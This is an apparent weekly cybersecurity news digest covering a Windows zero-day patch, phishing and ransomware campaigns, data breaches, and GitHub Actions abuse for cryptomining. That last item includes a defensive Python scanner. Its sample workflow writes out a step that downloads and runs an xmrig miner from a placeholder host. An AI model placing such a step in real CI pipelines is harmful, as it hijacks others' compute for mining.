Microsoft patched a zero-day vulnerability in Windows
On July 12, as part of Patch Tuesday, Microsoft fixed 84 security flaws in its products, including a zero-day vulnerability that is already being exploited by attackers.
CVE-2022-22047 (CVSS score 7.5) is a privilege escalation vulnerability in Windows. It stems from a boundary error within the Microsoft Windows Client/Server Runtime Subsystem (CSRSS). An attacker with access to the target system can run a specially crafted program to execute arbitrary code with SYSTEM privileges.
Microsoft warned about a large-scale AiTM phishing campaign
Over 10,000 organizations fell victim to a large-scale adversary-in-the-middle (AiTM) phishing campaign that began in September 2021. According to Microsoft, the threat actors targeted Office 365 users, including those who had enabled multi-factor authentication (MFA) on their accounts.
Using the victims' credentials and session cookies, the attackers hijacked mailboxes and carried out business email compromise (BEC) attacks against other targets.
Hackers impersonate cybersecurity companies to distribute malware
Threat actors are impersonating prominent cybersecurity companies to trick victims into installing malware. The attack chain begins with victims receiving emails that appear to originate from cybersecurity companies. According to these emails, "cybersecurity professionals" have identified malicious activity in the recipient's network. At the final stage of the attack, the unsuspecting victim installs a remote access trojan (RAT) that opens the door for further attacks.
Threat actors distribute new HavanaCrypt ransomware disguised as a Google Software Update
In an ongoing malicious campaign, threat actors are distributing a new ransomware strain disguised as a Google Software Update application.
HavanaCrypt is a .NET-based ransomware protected by Obfuscar, an open-source .NET obfuscator. The ransomware uses a Microsoft web hosting service IP address as its command-and-control (C&C) server to circumvent detection, which is not typical for ransomware.
Cybercriminals are abusing GitHub Actions and Azure virtual machines for cloud-based cryptocurrency mining
According to a recent Trend Micro report, threat actors can abuse the runners (the servers GitHub provides to run an organization's pipelines and automation) by downloading and installing crypto miners on them.
The researchers identified at least 1,000 repositories and over 550 code samples that abuse GitHub Actions (GHAs) for cryptocurrency mining. Similar variants of a YAML script containing commands to mine Monero were found in 11 repositories. All of them were connected to the same wallet, which indicates that the same actor is behind the operation.
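As an added illustration of the detection side of the GitHub Actions abuse described above (example code written for this digest, not code from Trend Micro's report), the following Python extracts every `run:` step from a workflow file and flags steps carrying cryptomining indicators. The indicator list and the sample workflow are constructed assumptions, not artefacts from the 11 repositories mentioned.

```python
import re

# Hypothetical indicator list for the mining tooling typically seen in such workflows (xmrig, Monero stratum pools); not taken from the report.
MINING_PATTERNS = [r"\bxmrig\b", r"stratum\+(tcp|ssl)://", r"\bmonero\b", r"--donate-level"]

# Constructed sample workflow modelled on the abuse pattern: a benign test step followed by a miner download step.
SAMPLE_WORKFLOW = """\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: test
        run: pytest -q
      - name: setup
        run: |
          curl -sL http://files.invalid/xmrig.tar.gz | tar xz
          ./xmrig -o stratum+tcp://pool.invalid:3333 -u WALLET_PLACEHOLDER
"""

def extract_run_commands(workflow_text):
    """Return the shell text of each `run:` step, joining `run: |` block scalars into one string."""
    commands, lines, i = [], workflow_text.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s+)?run:\s*(.*)$", lines[i])
        if m:
            key_indent, rest = len(m.group(1)), m.group(2).strip()
            if rest in ("|", "|-", ">", ">-"):
                # Block scalar: collect every following line indented deeper than the `run:` key.
                block, i = [], i + 1
                while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > key_indent):
                    block.append(lines[i].strip())
                    i += 1
                commands.append("\n".join(block))
                continue
            commands.append(rest)
        i += 1
    return commands

def scan_workflow(workflow_text):
    """Return (step_index, matched_pattern, command) for every run step that looks like cryptomining."""
    findings = []
    for idx, cmd in enumerate(extract_run_commands(workflow_text)):
        for pat in MINING_PATTERNS:
            if re.search(pat, cmd, re.IGNORECASE):
                findings.append((idx, pat, cmd))
                break
    return findings
```

Running `scan_workflow` over every file under `.github/workflows/` in a repository (or in a pull request from a fork) gives a cheap pre-merge check; the same approach can be turned into a rule for whatever CI-policy tooling an organization already uses.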
Ransomware gangs are making it easier to search for stolen files on their data leak websites
At least two ransomware operations and one extortion group have adopted a new tactic to pressure victims into paying to prevent the stolen files from being leaked. They added a search function to their leak sites so that potential buyers can more easily find specific files and details.
One of the ransomware gangs that adopted this tactic is the notorious BlackCat/ALPHV. Another is the LockBit ransomware operation. The extortion gang that tried to adopt the new approach is Karakurt, but its search option doesn't work properly, at least for now.
Personal info on 23 million Mangatoon users leaked in a data breach
A threat actor has stolen data belonging to 23 million users of the comic reading platform Mangatoon. In May, they siphoned the database from Mangatoon's Elasticsearch server, which was protected only by a weak password.
Last week, the data breach notification service Have I Been Pwned (HIBP) added 23 million Mangatoon accounts – names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes – to its platform.
The threat actor intends to publish or sell the stolen database at some point in the future.
Videogame publishing giant Bandai Namco fell victim to the BlackCat ransomware operation
The notorious BlackCat/ALPHV ransomware gang claimed to have successfully breached the Japanese videogame publisher Bandai Namco and siphoned its internal files. The publisher of the legendary Dark Souls and Pac-Man franchises confirmed the incident, which took place on July 3rd. According to the company's statement, the BlackCat gang compromised internal systems of its offices in Asian regions, excluding Japan.
Scammers stole $8 million from Uniswap users in a large-scale phishing attack
Users of the decentralized cryptocurrency exchange Uniswap lost $8 million worth of Ethereum in a sophisticated phishing attack. Scammers announced a fake giveaway and tricked the users into approving transfers of their funds.